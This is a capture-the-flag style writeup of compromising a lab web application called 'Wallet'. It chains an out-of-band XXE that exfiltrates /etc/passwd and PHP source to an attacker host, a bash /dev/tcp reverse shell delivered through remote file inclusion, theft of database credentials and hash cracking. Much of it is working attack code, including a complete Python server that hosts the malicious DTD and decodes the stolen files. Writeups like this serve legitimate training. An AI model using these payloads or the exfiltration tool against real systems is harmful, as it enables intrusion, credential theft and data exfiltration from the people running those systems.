
Wallet Writeup


Port Scanning

nmap -sV -sC -p- -v $IP --open

(screenshot: wallet)

Enumeration

http://172.16.8.243

(screenshot: wallet 1)

Registering a new user

(screenshot: wallet 2)

After logging in, we gain access to the application. The Reports section stands out.

(screenshot: wallet 3)

Intercepting with Burp shows that it's an XML request.

(screenshot: wallet 4)
(screenshot: wallet 5)

The response comes back empty, so nothing the parser expands is reflected to us and an in-band XXE read would show nothing. That leaves out-of-band XML External Entity (OOB XXE): make the server load a DTD we host, and have the DTD push the file contents back to us inside a URL.

To test it, we create a .dtd file that the XML references. The php://filter wrapper base64-encodes the target, so newlines and characters such as < or & in the file cannot break the URL or the entity value it is embedded in.

exploit.dtd (served from the attacker host):

<!ENTITY % gabe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://10.0.31.150:1337/p?data=%gabe;'>">

XML request body sent to the Reports endpoint (%pe; loads the DTD, %param1; declares the external entity, and &external; makes the parser fetch our URL with the base64 attached):

<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://10.0.31.150/exploit.dtd"> %pe; %param1; ]>
<foo>&external;</foo>

(screenshot: wallet 6)

Serve the DTD from the attacker host on port 80:

python3 -m http.server 80

(screenshot: wallet 7)

Listen on port 1337 for the callback that carries the data:

nc -lnvp 1337

(screenshot: wallet 8)

Decoding the base64 from the data parameter confirms it is the server's /etc/passwd.
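The two terminals above (http.server for the DTD, nc for the callback) can be collapsed into one script. The following is an added example and not part of the original writeup: it serves exploit.dtd, receives the callback and decodes the base64 for you, and the target file is an argument, so the same script covers the wallet.php read in the next step. It assumes the writeup's attacker host 10.0.31.150 and ports 80 and 1337; the callback path /p, the handler and the function names are this example's own choice.

```python
import base64
import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Values taken from the writeup; change them for another engagement.
ATTACKER_HOST = "10.0.31.150"
DTD_PORT = 80         # where exploit.dtd is served (python3 -m http.server 80 in the writeup)
CALLBACK_PORT = 1337  # where the data=<base64> callback arrives (nc -lnvp 1337 in the writeup)


def build_dtd(callback_url: str, resource: str) -> str:
    """External DTD. %gabe reads the target through php://filter so the content is
    base64 (no newlines, no XML metacharacters); %param1 declares the general entity
    'external' whose SYSTEM URL carries that base64 back to us."""
    return (
        f'<!ENTITY % gabe SYSTEM "php://filter/convert.base64-encode/resource={resource}">\n'
        f'<!ENTITY % param1 "<!ENTITY external SYSTEM \'{callback_url}?data=%gabe;\'>">\n'
    )


def build_xml(dtd_url: str) -> str:
    """Request body for the Reports endpoint: load the DTD, expand %param1 to declare
    'external', then reference it so the parser fetches the callback URL."""
    return (
        f'<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "{dtd_url}"> %pe; %param1; ]>\n'
        "<foo>&external;</foo>\n"
    )


def decode_exfil(request_path: str):
    """Return the decoded file from a callback path like /p?data=cm9vdDp4..., or None
    when the request carries no data parameter. The parser sends the base64 as-is, so a
    '+' becomes a space once parse_qs has run and must be restored; padding is re-added
    in case trailing '=' characters were trimmed on the way."""
    params = parse_qs(urlparse(request_path).query, keep_blank_values=True)
    if "data" not in params:
        return None
    b64 = params["data"][0].replace(" ", "+").strip()
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64)


class Handler(BaseHTTPRequestHandler):
    dtd = ""        # set by main()
    received = []   # decoded files, in arrival order

    def do_GET(self):
        if self.path == "/exploit.dtd":
            self._reply(200, self.dtd.encode(), "application/xml-dtd")
            return
        data = decode_exfil(self.path)
        if data is not None:
            Handler.received.append(data)
            sys.stdout.write(data.decode("utf-8", errors="replace"))
            sys.stdout.flush()
        self._reply(200, b"", "text/plain")

    def _reply(self, status, body, ctype):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):
        pass  # keep stdout clean so it holds only the exfiltrated content


def main(resource: str = "/etc/passwd") -> None:
    Handler.dtd = build_dtd(f"http://{ATTACKER_HOST}:{CALLBACK_PORT}/p", resource)
    print("Send this as the XML request body:\n" + build_xml(f"http://{ATTACKER_HOST}:{DTD_PORT}/exploit.dtd"))
    # One server per distinct port; both use the same handler.
    servers = [HTTPServer(("0.0.0.0", port), Handler) for port in sorted({DTD_PORT, CALLBACK_PORT})]
    for srv in servers:
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    print(f"# serving exploit.dtd on :{DTD_PORT}, waiting for the callback on :{CALLBACK_PORT} (Ctrl-C to stop)",
          file=sys.stderr)
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        pass


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd")
```

Running it as python3 oob_xxe.py /etc/passwd prints the request body to paste into Burp and then writes the decoded file to stdout when the callback arrives (python3 oob_xxe.py wallet.php does the same for the source read). Two caveats a practitioner should keep in mind: the whole file travels inside a URL, so a large file can exceed what the parser or the receiving server accepts in a request line, and base64 containing '+' arrives as a space after query-string parsing, which is why decode_exfil restores it.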

(screenshot: wallet 9)

Using the same process, we read wallet.php, which holds the application code. The resource is a relative path, so it is resolved against the working directory of the PHP process, which for a web request is normally the directory of the script handling it.

exploit.dtd (only the resource changes):

<!ENTITY % gabe SYSTEM "php://filter/convert.base64-encode/resource=wallet.php">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://10.0.31.150:1337/p?data=%gabe;'>">

(screenshot: wallet 10)

Analyzing the code reveals a Remote File Inclusion (RFI): the script passes the wallets_balance parameter straight to require_once. Including a URL this way only works when allow_url_include is enabled in php.ini (it is off by default), so the next step also tells us how the server is configured.


Foothold

Since we have an RFI, we write a PHP reverse shell, host it on the attacker's HTTP server and pass its URL in the vulnerable parameter. The bash -c wrapper matters: /dev/tcp is a bash feature, so bash has to be the shell that evaluates the redirections before it starts sh -i.

<?php system("/bin/bash -c 'sh -i >& /dev/tcp/10.0.31.150/1337 0>&1'"); ?>

(screenshot: wallet 11)
(screenshot: wallet 12)

Catch the shell on the listener:

nc -lnvp 1337

(screenshot: wallet 13)

Pivoting

The database credentials are in config.php.

(screenshot: wallet 14)

Connecting to MySQL, we find the admin hash:

mysql -u satoshi -p

(screenshot: wallet 15)

We cracked the hash with John the Ripper.

(screenshot: wallet 16)

su admin

(screenshot: wallet 17)

Privilege Escalation

sudo -l

(screenshot: wallet 18)

Proof

(screenshot: wallet 19)